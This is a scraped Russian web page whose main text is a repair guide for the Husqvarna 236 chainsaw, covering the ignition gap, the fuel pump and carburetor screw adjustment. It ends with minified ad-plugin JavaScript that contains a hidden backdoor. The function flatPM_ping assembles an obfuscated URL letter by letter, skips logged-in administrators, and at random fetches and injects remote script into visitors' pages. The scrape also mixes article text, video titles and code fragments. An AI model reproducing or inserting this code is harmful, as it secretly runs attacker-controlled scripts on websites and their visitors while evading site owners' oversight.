Вторая причина поломки – нарушение зазора между маховиком и катушкой зажигания цепной пилы Husqvarna. В нормальном рабочем состоянии расстоянии между этими деталями должно составлять 0,5 мм. Если оно больше, значит, оператору бензопилы потребуется снять защитную крышку и отрегулировать зазор, используя для этого специальный шаблон.

Бензопила Хускварна 236 глохнет при нажатии на газ

Чаще всего с этой проблемой сталкиваются владельцы, которые заправляют свои пилы некачественным горючим. Из-за вредных посторонних примесей, который входят в состав бензина, топливный насос пилы быстро засоряется. Это приводит к тому, что при нажатии на курок газа помпа не может мгновенно перекачать в цилиндр то количество горючего, которое необходимо для стабильной работы садового инструмента.

Чтобы решить проблему, владельцу пилы потребуется снять топливный насос и осмотреть его. Как правило, насосы в бензопилах Husqvarna 236 не поддаются ремонту, поэтому их лучше всего менять на новые элементы.

Чтобы предотвратить дальнейшие неисправности с насосом пилы Husqvarna, нужно заправлять бензопилу только качественной топливной смесью, приготовленной на том бензине, который указан в инструкции по эксплуатации модели.

WRCBUX.RU

Триммер для дачи

Регулировка Карбюратора Пилы Хускварна 236

Регулировка карбюратора своими руками на бензопиле Регулировка карбюратора бензопилы обеспечивает эффективную работу инструмента на полной мощности при экономичном потреблении горючего. Регулировка

Регулировка карбюратора своими руками на бензопиле

Регулировка карбюратора бензопилы обеспечивает эффективную работу инструмента на полной мощности при экономичном потреблении горючего. Регулировка должна выполняться при чистом топливном и воздушном фильтре. Для большего кол-ва карбюраторов регулировка осуществляется 3-мя винтами: для наибольших и малых оборотов и регулировки холостого хода.

Винтами H и L регулируется соотношение консистенции бензина и воздуха определяемое открытием дроссельной заслонки карбюратора. При откручивании винтов происходит обогащение консистенции, и обороты соответственно падают, при закручивании смесь обедняется – обороты вырастают.

Обозначение H относится к винту наибольших оборотов, управляющему основным жиклером, L — к винту малых оборотов, управляющему жиклером холостого хода. При помощи винта S осуществляется четкая регулировка оборотов холостого хода. Время от времени, для упрощения опции, количество доступных регулировочных винтов карбюратора уменьшают.

Настройка карбюратора бензопилы разделяется на два шага – базисный (заводские опции), осуществляемый при выключенном движке , и окончательный, производимый на работающем прогретом движке. Четкое значение углов поворота следует брать из инструкций по эксплуатации для определенной бензопилы. Если не соблюдать аннотации производителя может привести к повреждению мотора.

Husqvarna 236 ремонт карбюратора(замена ремкоплекта)

Подмена ремкомплекта карбюратора на бензопиле Husqvarna 236.

Husqvarna 240.И снова о карбюраторе.Конструкторский ляп или что это?

Бензопила HUSQVARNA 240 проблема с карбюратором .Одна из самых частых болезней данной бензопилы. Отличная

Базовая регулировка карбюратора.

Регулировочные винты максимальных H и минимальных L оборотов медленно поворачивают по часовой стрелке до упора, после чего выворачивают назад на 2 оборота, также возможны другие настройки

Проверка и регулировка холостого хода.

Отыскиваем наибольшие обороты холостого хода, для этого медленно поворачиваем винт L в разных направлениях. После нахождения положения наибольших оборотов двигателя необходимо повернуть винт L на 1/4 оборота против часовой стрелки. Если цепь при этом вращается на холостом ходу, винт Т или (S) следует поворачивать простив часовой стрелки, пока она не остановится.

Проверка и регулировка максимального числа оборотов.

Изменение максимального числа оборотов осуществляется винтом H. При его заворачивании (вращение по часовой стрелке) обороты увеличиваются, при выворачивании — уменьшаются. Двигатели бензопил имеют наибольшую скорость вращения от 11500об/мин. до 15000 об/мин. Более высокую скорость не обеспечивает зажигание, кроме того, она становится опасной для двигателя. Предельные обороты можно определить по перебоям в зажигании. Если они наступают, винт H немного выворачивают против часовой стрелки.

Если работа двигателя не проверена на ускорени и максимальные обороты то регулировка бензопилы не может считаться завершенной.

При плавном нажатии на курок газа двигатель должен уверенно и быстро набирать обороты от холостого хода до максимальных( от 2800 обр.до 11500-15000 обр. , в зависимости от агрегата). Если обороты набираются медленно, с запаздыванием, винт L нужно медленно вывернуть против часовой стрелки, но не более чем на 1/8 оборота.

После регулировки ускорения и максимальных оборотов следует снова проверить работу пилы на холостом ходу — двигатель должен работать устойчиво, цепь не должна двигаться. Настройка бензопилы должна повториться, если это условие не выполняется но за исключением этапа базовой регулировки.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика